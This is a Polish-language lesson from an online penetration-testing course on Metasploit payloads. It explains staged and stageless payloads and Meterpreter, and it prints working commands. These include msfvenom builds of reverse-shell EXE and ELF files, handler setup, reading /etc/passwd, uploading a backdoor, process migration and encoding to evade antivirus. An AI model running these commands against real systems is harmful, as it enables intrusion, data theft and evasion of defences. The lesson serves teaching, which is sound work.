Payloady: staged, stageless i Meterpreter
Dobiorą Państwo odpowiedni payload do danego scenariusza i wykorzystają Meterpreter po uzyskaniu dostępu.
Payloady: staged, stageless i Meterpreter to bezpłatna lekcja Cyber Security Academy na CoddyKit. To lekcja 3 z 4. Możesz przeczytać całą lekcję poniżej za darmo — a potem ćwiczyć ją interaktywnie w przeglądarce z wbudowanym edytorem kodu i tutorem AI dostępnym 24/7. To część ścieżki edukacyjnej Cyber Security Academy, a Twój postęp synchronizuje się między webem a aplikacją CoddyKit. Kurs Cyber Security Academy zawiera 4 lekcji w sumie.
Czym jest payload?
Payload to kod uruchamiany na celu po pomyślnym wykorzystaniu podatności. Określa, co zyskuje atakujący: powłokę, możliwość wykonywania poleceń, dostęp do plików lub rozbudowanego agenta, takiego jak Meterpreter.
Payloady staged i stageless
Payloady stageless (/) zawierają wszystko w jednym pliku binarnym — są większe, ale prostsze, i po początkowym dostarczeniu nie wymagają zwrotnego połączenia sieciowego. Payloady staged (//) najpierw wysyłają niewielki stager, który pobiera drugi etap z handlera.
# Stageless (single slash naming):
windows/x64/shell_reverse_tcp
# Staged (double slash naming):
windows/x64/shell/reverse_tcp
# ^
# stage 2 downloaded after stager connectsKiedy używać poszczególnych typów
Używaj payloadu stageless, gdy cel nie ma dostępu do Internetu ani handlera po początkowym wykorzystaniu podatności — payload musi być samowystarczalny. Używaj payloadu staged, gdy chcesz zmniejszyć początkowy payload i masz niezawodne połączenie z handlerem.
Przegląd Meterpreter
Meterpreter to zaawansowany payload Metasploit — działa w całości w pamięci, zapewnia szyfrowaną komunikację i udostępnia rozbudowane API obejmujące dostęp do systemu plików, migrację procesów, rejestrowanie naciśnięć klawiszy, wykonywanie zrzutów ekranu oraz pivoting.
msf6 > use exploit/multi/handler
msf6 > set payload windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 192.168.1.10
msf6 > set LPORT 4444
msf6 > runPolecenia Meterpreter
Najważniejsze polecenia Meterpreter używane po uzyskaniu dostępu obejmują informacje o systemie, listę procesów, operacje na plikach i funkcje sieciowe.
meterpreter > sysinfo # system information
meterpreter > getuid # current user
meterpreter > ps # process list
meterpreter > download /etc/passwd
meterpreter > upload backdoor.sh /tmp/
meterpreter > shell # drop to OS shellMigracja procesu
Przenieś proces Meterpreter do stabilniejszego lub mniej podejrzanego procesu (np. explorer.exe w systemie Windows). Może to również podwyższyć uprawnienia, jeśli proces zostanie przeniesiony do procesu działającego z wyższymi uprawnieniami.
meterpreter > ps
meterpreter > migrate 1234 # migrate to PID 1234
# Migrate to explorer.exe for stability
# Avoids termination if original process exitsGenerowanie payloadów za pomocą msfvenom
msfvenom generuje samodzielne pliki payloadów (EXE, ELF, APK, shellcode) do dostarczania za pomocą phishingu, nośników USB lub powłok webowych w ramach autoryzowanych testów.
# Windows reverse shell EXE
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.10 LPORT=4444 \
-f exe -o payload.exe
# Linux ELF
msfvenom -p linux/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.10 LPORT=4444 \
-f elf -o payload.elfMulti/Handler do przechwytywania powłok
Moduł auxiliary multi/handler przechwytuje połączenia zwrotnych powłok. Przed dostarczeniem payloadu skonfiguruj go z takim samym payloadem, LHOST i LPORT, jakich użyto w msfvenom.
msf6 > use exploit/multi/handler
msf6 > set payload windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 0.0.0.0
msf6 > set LPORT 4444
msf6 > run -j # run as background jobPodstawy kodowania i omijania zabezpieczeń
Encodery msfvenom mogą zaciemniać payloady, aby omijać podstawowe wykrywanie przez programy AV oparte na sygnaturach. Uwaga: nowoczesne rozwiązania EDR stosują wykrywanie behawioralne — same encodery nie wystarczą przeciwko zaawansowanym mechanizmom obronnym.
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.10 LPORT=4444 \
-e x64/xor_dynamic -i 5 \
-f exe -o encoded_payload.exePayloady bind i reverse
Payloady reverse łączą się z celu do atakującego (lepsze rozwiązanie w przypadku NAT i zapór sieciowych). Payloady bind nasłuchują na celu — atakujący łączy się z nim. W większości scenariuszy preferowane są payloady reverse.
Wykrywanie payloadów przez obrońców
Obrońcy wykrywają Meterpreter za pomocą sygnatur sieciowych (wzorce ruchu C2), skanowania pamięci (artefakty refleksyjnego wstrzykiwania bibliotek DLL) oraz analizy behawioralnej (process hollowing, nietypowe relacje proces nadrzędny–proces podrzędny).
Szybki sprawdzian
Co odróżnia payload staged od payloadu stageless w Metasploit?
Podsumowanie: payloady i Meterpreter
Wybieraj payloady staged, gdy zależy Ci na małym początkowym rozmiarze, a stageless, gdy potrzebujesz samodzielnego dostarczania. Meterpreter to najbardziej rozbudowany payload do działań po uzyskaniu dostępu: działa w pamięci, zapewnia szyfrowanie i można go rozszerzać. Używaj msfvenom do generowania samodzielnych plików binarnych i zawsze konfiguruj multi/handler do przechwytywania połączeń zwrotnych.
Ucz się Cyber Security Academy dzięki korepetycjom AI — za darmo
Pisz i uruchamiaj kod w przeglądarce, otrzymuj natychmiastową pomoc od korepetytora AI dostępnego 24/7 i kontynuuj naukę w sieci lub w aplikacji.
- Kursy
- 76
- Lekcje
- 303
Często zadawane pytania
Czy lekcja „Payloady: staged, stageless i Meterpreter” jest bezpłatna?
Tak — pełny tekst „Payloady: staged, stageless i Meterpreter” jest dostępny za darmo tutaj w sieci. Aby ćwiczyć ją interaktywnie (wbudowany edytor kodu i tutor AI dostępny 24/7) i odblokować resztę kursu Cyber Security Academy, przejdź na CoddyKit PRO. Kurs Cyber Security Academy zawiera 4 lekcji w sumie.
Co nauczysz się w „Payloady: staged, stageless i Meterpreter”?
Dobiorą Państwo odpowiedni payload do danego scenariusza i wykorzystają Meterpreter po uzyskaniu dostępu. Ćwiczysz Cyber Security Academy z praktycznym kodem, który uruchamiasz bezpośrednio w przeglądarce, a tutor AI dostępny 24/7 odpowiada na Twoje pytania podczas pracy nad lekcją.
Czy potrzebuję doświadczenia, aby zacząć Cyber Security Academy?
Nie wymagamy żadnego doświadczenia. Cyber Security Academy w CoddyKit jest strukturyzowany dla początkujących i zaawansowanych użytkowników, więc możesz zacząć tutaj lub od początku i uczyć się w swoim tempie. To lekcja 3 z 4.
Ile czasu zajmuje lekcja „Payloady: staged, stageless i Meterpreter”?
Większość lekcji CoddyKit trwa około 5–10 minut. Każda lekcja to mały, interaktywny krok, dzięki czemu robisz systematyczne postępy i zawsze wracasz dokładnie do tego samego miejsca — na webie i w aplikacji.
Czy mogę pisać i uruchamiać kod w tej lekcji Cyber Security Academy?
Tak. Każda lekcja Cyber Security Academy zawiera wbudowany edytor kodu, więc piszesz i uruchamiasz prawdziwy kod bezpośrednio w przeglądarce i od razu otrzymujesz sprzężenie zwrotne od AI — bez konfiguracji na komputerze.
Wszystkie lekcje w tym kursie
- Architektura Metasploit i msfconsole
- Wykorzystanie znanej podatności
- Payloady: staged, stageless i Meterpreter
- Po uzyskaniu dostępu: pivoting i utrzymanie dostępu